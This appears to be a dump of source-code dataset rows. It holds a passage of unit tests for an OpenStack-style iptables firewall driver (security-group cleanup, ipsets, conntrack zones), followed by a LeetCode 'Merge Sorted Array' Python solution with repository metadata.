remote_groups = remote_groups or {_IPv4: [FAKE_SGID],
_IPv6: [FAKE_SGID]}
rules = []
for ip_version, remote_group_list in remote_groups.items():
for remote_group in remote_group_list:
rules.append(self._fake_sg_rule_for_ethertype(ip_version,
remote_group))
return {sg_id: rules}
def _fake_sg_members(self, sg_ids=None):
return {sg_id: copy.copy(FAKE_IP) for sg_id in (sg_ids or [FAKE_SGID])}
def test_update_security_group_members(self):
sg_members = {'IPv4': ['10.0.0.1', '10.0.0.2'], 'IPv6': ['fe80::1']}
self.firewall.update_security_group_members('fake_sgid', sg_members)
calls = [
mock.call.set_members('fake_sgid', 'IPv4',
['10.0.0.1', '10.0.0.2']),
mock.call.set_members('fake_sgid', 'IPv6',
['fe80::1'])
]
self.firewall.ipset.assert_has_calls(calls, any_order=True)
def _setup_fake_firewall_members_and_rules(self, firewall):
firewall.sg_rules = self._fake_sg_rules()
firewall.pre_sg_rules = self._fake_sg_rules()
firewall.sg_members = self._fake_sg_members()
firewall.pre_sg_members = firewall.sg_members
def _prepare_rules_and_members_for_removal(self):
self._setup_fake_firewall_members_and_rules(self.firewall)
self.firewall.pre_sg_members[OTHER_SGID] = (
self.firewall.pre_sg_members[FAKE_SGID])
def test_determine_remote_sgs_to_remove(self):
self._prepare_rules_and_members_for_removal()
ports = [self._fake_port()]
self.assertEqual(
{_IPv4: set([OTHER_SGID]), _IPv6: set([OTHER_SGID])},
self.firewall._determine_remote_sgs_to_remove(ports))
def test_determine_remote_sgs_to_remove_ipv6_unreferenced(self):
self._prepare_rules_and_members_for_removal()
ports = [self._fake_port()]
self.firewall.sg_rules = self._fake_sg_rules(
remote_groups={_IPv4: [OTHER_SGID, FAKE_SGID],
_IPv6: [FAKE_SGID]})
self.assertEqual(
{_IPv4: set(), _IPv6: set([OTHER_SGID])},
self.firewall._determine_remote_sgs_to_remove(ports))
def test_get_remote_sg_ids_by_ipversion(self):
self.firewall.sg_rules = self._fake_sg_rules(
remote_groups={_IPv4: [FAKE_SGID], _IPv6: [OTHER_SGID]})
ports = [self._fake_port()]
self.assertEqual(
{_IPv4: set([FAKE_SGID]), _IPv6: set([OTHER_SGID])},
self.firewall._get_remote_sg_ids_sets_by_ipversion(ports))
def test_get_remote_sg_ids(self):
self.firewall.sg_rules = self._fake_sg_rules(
remote_groups={_IPv4: [FAKE_SGID, FAKE_SGID, FAKE_SGID],
_IPv6: [OTHER_SGID, OTHER_SGID, OTHER_SGID]})
port = self._fake_port()
self.assertEqual(
{_IPv4: set([FAKE_SGID]), _IPv6: set([OTHER_SGID])},
self.firewall._get_remote_sg_ids(port))
def test_determine_sg_rules_to_remove(self):
self.firewall.pre_sg_rules = self._fake_sg_rules(sg_id=OTHER_SGID)
ports = [self._fake_port()]
self.assertEqual(set([OTHER_SGID]),
self.firewall._determine_sg_rules_to_remove(ports))
def test_get_sg_ids_set_for_ports(self):
sg_ids = set([FAKE_SGID, OTHER_SGID])
ports = [self._fake_port(sg_id) for sg_id in sg_ids]
self.assertEqual(sg_ids,
self.firewall._get_sg_ids_set_for_ports(ports))
def test_remove_sg_members(self):
self.firewall.sg_members = self._fake_sg_members([FAKE_SGID,
OTHER_SGID])
remote_sgs_to_remove = {_IPv4: set([FAKE_SGID]),
_IPv6: set([FAKE_SGID, OTHER_SGID])}
self.firewall._remove_sg_members(remote_sgs_to_remove)
self.assertIn(OTHER_SGID, self.firewall.sg_members)
self.assertNotIn(FAKE_SGID, self.firewall.sg_members)
def test_remove_unused_security_group_info_clears_unused_rules(self):
self._setup_fake_firewall_members_and_rules(self.firewall)
self.firewall.prepare_port_filter(self._fake_port())
# create another SG which won't be referenced by any filtered port
fake_sg_rules = self.firewall.sg_rules['fake_sgid']
self.firewall.pre_sg_rules[OTHER_SGID] = fake_sg_rules
self.firewall.sg_rules[OTHER_SGID] = fake_sg_rules
# call the cleanup function, and check the unused sg_rules are out
self.firewall._remove_unused_security_group_info()
self.assertNotIn(OTHER_SGID, self.firewall.sg_rules)
def test_remove_unused_security_group_info(self):
    """Member info of an SG referenced by no rule is purged."""
    self.firewall.sg_members = {OTHER_SGID: {_IPv4: [], _IPv6: []}}
    self.firewall.pre_sg_members = self.firewall.sg_members
    # Every rule points at FAKE_SGID only, so OTHER_SGID is unused.
    rules = self._fake_sg_rules(
        remote_groups={_IPv4: [FAKE_SGID], _IPv6: [FAKE_SGID]})
    self.firewall.sg_rules = rules
    self.firewall.pre_sg_rules = rules
    self.firewall.filtered_ports['tapfake_dev'] = self._fake_port()
    self.firewall._remove_unused_security_group_info()
    self.assertNotIn(OTHER_SGID, self.firewall.sg_members)
def test_not_remove_used_security_group_info(self):
    """Member info survives cleanup while a rule still references the SG."""
    self.firewall.sg_members = {OTHER_SGID: {_IPv4: [], _IPv6: []}}
    self.firewall.pre_sg_members = self.firewall.sg_members
    # Rules keep referencing OTHER_SGID, so its members must stay.
    rules = self._fake_sg_rules(
        remote_groups={_IPv4: [OTHER_SGID], _IPv6: [OTHER_SGID]})
    self.firewall.sg_rules = rules
    self.firewall.pre_sg_rules = rules
    self.firewall.filtered_ports['tapfake_dev'] = self._fake_port()
    self.firewall._remove_unused_security_group_info()
    self.assertIn(OTHER_SGID, self.firewall.sg_members)
def test_remove_all_unused_info(self):
    """With no filtered ports left, all member and rule info is cleared."""
    self._setup_fake_firewall_members_and_rules(self.firewall)
    self.firewall.filtered_ports = {}
    self.firewall._remove_unused_security_group_info()
    self.assertFalse(self.firewall.sg_members)
    self.assertFalse(self.firewall.sg_rules)
def test_single_fallback_accept_rule(self):
    """Exactly one sg-chain ACCEPT fallback is added per IP version."""
    port_a, port_b = self._fake_port(), self._fake_port()
    self.firewall._setup_chains_apply(dict(p1=port_a, p2=port_b), {})
    accept_call = mock.call('sg-chain', '-j ACCEPT')
    for table in (self.firewall.iptables.ipv4['filter'],
                  self.firewall.iptables.ipv6['filter']):
        recorded = table.add_rule.mock_calls
        matches = [c for c in recorded if c == accept_call]
        self.assertEqual(1, len(matches))
def test_remove_port_filter_with_destroy_ipset_chain(self):
    """Removing an SG's last port resets members and destroys its ipsets."""
    self.firewall.sg_rules = self._fake_sg_rules()
    port = self._fake_port()
    self.firewall.pre_sg_members = {'fake_sgid': {
        'IPv4': [],
        'IPv6': []}}
    sg_members = {'IPv4': ['10.0.0.1'], 'IPv6': ['fe80::1']}
    self.firewall.update_security_group_members('fake_sgid', sg_members)
    self.firewall.prepare_port_filter(port)
    self.firewall.filter_defer_apply_on()
    # While the apply is deferred, membership drops to empty and the
    # previous members are recorded in pre_sg_members.
    self.firewall.sg_members = {'fake_sgid': {
        'IPv4': [],
        'IPv6': []}}
    self.firewall.pre_sg_members = {'fake_sgid': {
        'IPv4': ['10.0.0.1'],
        'IPv6': ['fe80::1']}}
    self.firewall.remove_port_filter(port)
    self.firewall.filter_defer_apply_off()
    # The ipset helper must have populated, queried and finally torn down
    # both the IPv4 and IPv6 sets for the SG.
    expected_calls = [
        mock.call.set_members('fake_sgid', 'IPv4', ['10.0.0.1']),
        mock.call.set_members('fake_sgid', 'IPv6', ['fe80::1']),
        mock.call.get_name('fake_sgid', 'IPv4'),
        mock.call.set_name_exists('NIPv4fake_sgid'),
        mock.call.get_name('fake_sgid', 'IPv6'),
        mock.call.set_name_exists('NIPv6fake_sgid'),
        mock.call.destroy('fake_sgid', 'IPv4'),
        mock.call.destroy('fake_sgid', 'IPv6')]
    self.firewall.ipset.assert_has_calls(expected_calls, any_order=True)
def test_filter_defer_apply_off_with_sg_only_ipv6_rule(self):
    """When only the IPv4 rule goes away, only the IPv4 ipset is destroyed."""
    self.firewall.sg_rules = self._fake_sg_rules()
    self.firewall.pre_sg_rules = self._fake_sg_rules()
    self.firewall.ipset_chains = {'IPv4fake_sgid': ['10.0.0.2'],
                                  'IPv6fake_sgid': ['fe80::1']}
    self.firewall.sg_members = {'fake_sgid': {
        'IPv4': ['10.0.0.2'],
        'IPv6': ['fe80::1']}}
    self.firewall.pre_sg_members = {'fake_sgid': {
        'IPv4': ['10.0.0.2'],
        'IPv6': ['fe80::1']}}
    # Drop the IPv4 remote-group rule so only the IPv6 one remains.
    self.firewall.sg_rules['fake_sgid'].remove(
        {'direction': 'ingress', 'remote_group_id': 'fake_sgid',
         'ethertype': 'IPv4'})
    self.firewall.sg_rules.update()
    self.firewall._defer_apply = True
    self.firewall.filtered_ports['tapfake_dev'] = self._fake_port()
    self.firewall._pre_defer_filtered_ports = {}
    self.firewall._pre_defer_unfiltered_ports = {}
    self.firewall.filter_defer_apply_off()
    self.firewall.ipset.assert_has_calls(
        [mock.call.destroy('fake_sgid', 'IPv4')], True)
def test_sg_rule_expansion_with_remote_ips(self):
    """A remote-group rule expands to one rule per member IP, skipping the port's own."""
    other_ips = ['10.0.0.2', '10.0.0.3', '10.0.0.4']
    self.firewall.sg_members = {'fake_sgid': {
        'IPv4': [FAKE_IP['IPv4']] + other_ips,
        'IPv6': [FAKE_IP['IPv6']]}}
    port = self._fake_port()
    base_rule = self._fake_sg_rule_for_ethertype(_IPv4, FAKE_SGID)
    expanded = self.firewall._expand_sg_rule_with_remote_ips(
        base_rule, port, 'ingress')
    expected = [dict(base_rule, source_ip_prefix='%s/32' % ip)
                for ip in other_ips]
    self.assertEqual(list(expanded), expected)
def test_build_ipv4v6_mac_ip_list(self):
    """MAC/IP pairs land in the right list; the derived v6 LLA is added once."""
    mac_dashed = 'ffff-ff0f-ffff'
    mac_colon = 'FF:FF:FF:0F:FF:FF'
    v4 = FAKE_IP['IPv4']
    v6 = FAKE_IP['IPv6']
    got_v4, got_v6 = [], []
    self.firewall._build_ipv4v6_mac_ip_list(mac_dashed, v4,
                                            got_v4, got_v6)
    self.assertEqual([(mac_colon, v4)], got_v4)
    self.firewall._build_ipv4v6_mac_ip_list(mac_dashed, v6,
                                            got_v4, got_v6)
    # The first IPv6 address also contributes the link-local address
    # derived from the MAC.
    want_v6 = [(mac_colon, v6),
               (mac_colon, 'fe80::fdff:ffff:fe0f:ffff')]
    self.assertEqual(want_v6, got_v6)
    # A second IPv6 address must not add the LLA a second time.
    v6_extra = 'fe81::1'
    self.firewall._build_ipv4v6_mac_ip_list(mac_dashed, v6_extra,
                                            got_v4, got_v6)
    want_v6.append((mac_colon, v6_extra))
    self.assertEqual(want_v6, got_v6)
class OVSHybridIptablesFirewallTestCase(BaseIptablesFirewallTestCase):
    """Conntrack-zone bookkeeping of the OVS-hybrid iptables driver."""

    def test__populate_initial_zone_map(self):
        """The initial device->zone map matches the fixture data."""
        self.assertEqual(self._dev_zone_map,
                         self.firewall.ipconntrack._device_zone_map)

    def test__generate_device_zone(self):
        """Zones fill upward first, then reuse gaps, then recycle when full."""
        # Fixture data occupies zones 1, 2 and 9, so the next grant is 10.
        self.assertEqual(
            10, self.firewall.ipconntrack._generate_device_zone('test'))
        # Park a device on the top zone to force gap scanning.
        self.firewall.ipconntrack._device_zone_map['someport'] = (
            ip_conntrack.MAX_CONNTRACK_ZONES)
        for zone in range(3, 9):
            self.assertEqual(
                zone, self.firewall.ipconntrack._generate_device_zone(zone))
        # 9 and 10 are taken, so the next free zone is 11.
        self.assertEqual(
            11, self.firewall.ipconntrack._generate_device_zone('p11'))
        # Freeing zone 1 makes it the next pick.
        self.firewall.ipconntrack._device_zone_map.pop('e804433b-61')
        self.assertEqual(
            1, self.firewall.ipconntrack._generate_device_zone('p1'))
        # Exhaust the whole zone space; a direct probe must then raise.
        for zone in range(1, 65536):
            self.firewall.ipconntrack._device_zone_map['dev-%s' % zone] = zone
        with testtools.ExpectedException(n_exc.CTZoneExhaustedError):
            self.firewall.ipconntrack._find_open_zone()
        # A fresh request triggers a cleanup and hands out zone 1 again.
        self.assertEqual(
            1, self.firewall.ipconntrack._generate_device_zone('p12'))
        self.assertEqual({'p12': 1},
                         self.firewall.ipconntrack._device_zone_map)

    def test_get_device_zone(self):
        """Zone lookup keys on the network id truncated to 11 characters."""
        dev = {'device': 'tap1234', 'network_id': '12345678901234567'}
        # Zones 1, 2 and 9 are pre-populated, so this device gets 10.
        self.assertEqual(10, self.firewall.ipconntrack.get_device_zone(dev))
        self._dev_zone_map.update({'12345678901': 10})
        self.assertEqual(self._dev_zone_map,
                         self.firewall.ipconntrack._device_zone_map)

    def test_multiple_firewall_with_common_conntrack(self):
        """Separate driver instances share the same ipconntrack object."""
        self.firewall1 = iptables_firewall.OVSHybridIptablesFirewallDriver()
        self.firewall2 = iptables_firewall.OVSHybridIptablesFirewallDriver()
        self.assertEqual(id(self.firewall1.ipconntrack),
                         id(self.firewall2.ipconntrack))
| [
"xjforfuture@163.com"
] | xjforfuture@163.com |
62434b8a6735fc1a9f7355464680ab37f69140cc | 4ac687bc28b9f5cf7f822e9d4c0db8b46fe363b3 | /88-Merge_Sorted_Array.py | 648b3e7fbf941c1b8741ec21892efe0d755d71da | [
"MIT"
] | permissive | QuenLo/LeetCode-share | b1e75e02e1dfe85be44ddb0ae1f4345353b0b569 | ce861103949510dc54fd5cb336bd992c40748de2 | refs/heads/master | 2021-12-23T11:23:09.111711 | 2021-11-15T18:54:46 | 2021-11-15T18:54:46 | 131,681,273 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,539 | py | # Time complexity : O(n + m)
# Space: O(m)
class Solution:
    """In-place merge of two sorted integer lists (LeetCode 88).

    Merges the first ``m`` elements of ``nums1`` with the ``n`` elements
    of ``nums2`` into ``nums1``, which is pre-sized to length ``m + n``.
    Filling from the back removes the O(m) temporary copy (and the
    redundant early-return guards) the original forward merge needed:
    O(m + n) time, O(1) extra space.
    """

    def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
        """
        Do not return anything, modify nums1 in-place instead.
        """
        i = m - 1  # last valid element of nums1's own data
        j = n - 1  # last element of nums2
        # Fill slots from the back; the largest remaining value goes last,
        # so no element of nums1 is overwritten before it is consumed.
        for p in range(m + n - 1, -1, -1):
            if j < 0 or (i >= 0 and nums1[i] >= nums2[j]):
                nums1[p] = nums1[i]
                i -= 1
            else:
                nums1[p] = nums2[j]
                j -= 1
class SolutionII:
    """Alternative in-place merge for LeetCode 88.

    Walks both inputs front to back, writing into ``nums1`` while reading
    from a snapshot of its original contents.  O(m + n) time, O(m + n)
    extra space for the snapshot.
    """

    def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
        """
        Do not return anything, modify nums1 in-place instead.
        """
        if n < 1:
            return
        if m < 1:
            nums1[:] = nums2[:]
            return
        snapshot = nums1[:]
        i = j = 0
        while i < m or j < n:
            # Take from the snapshot when nums2 is exhausted, or when both
            # sides remain and the snapshot's next value is not larger;
            # otherwise take from nums2.
            if j >= n or (i < m and snapshot[i] <= nums2[j]):
                nums1[i + j] = snapshot[i]
                i += 1
            else:
                nums1[i + j] = nums2[j]
                j += 1
| [
"noreply@github.com"
] | QuenLo.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.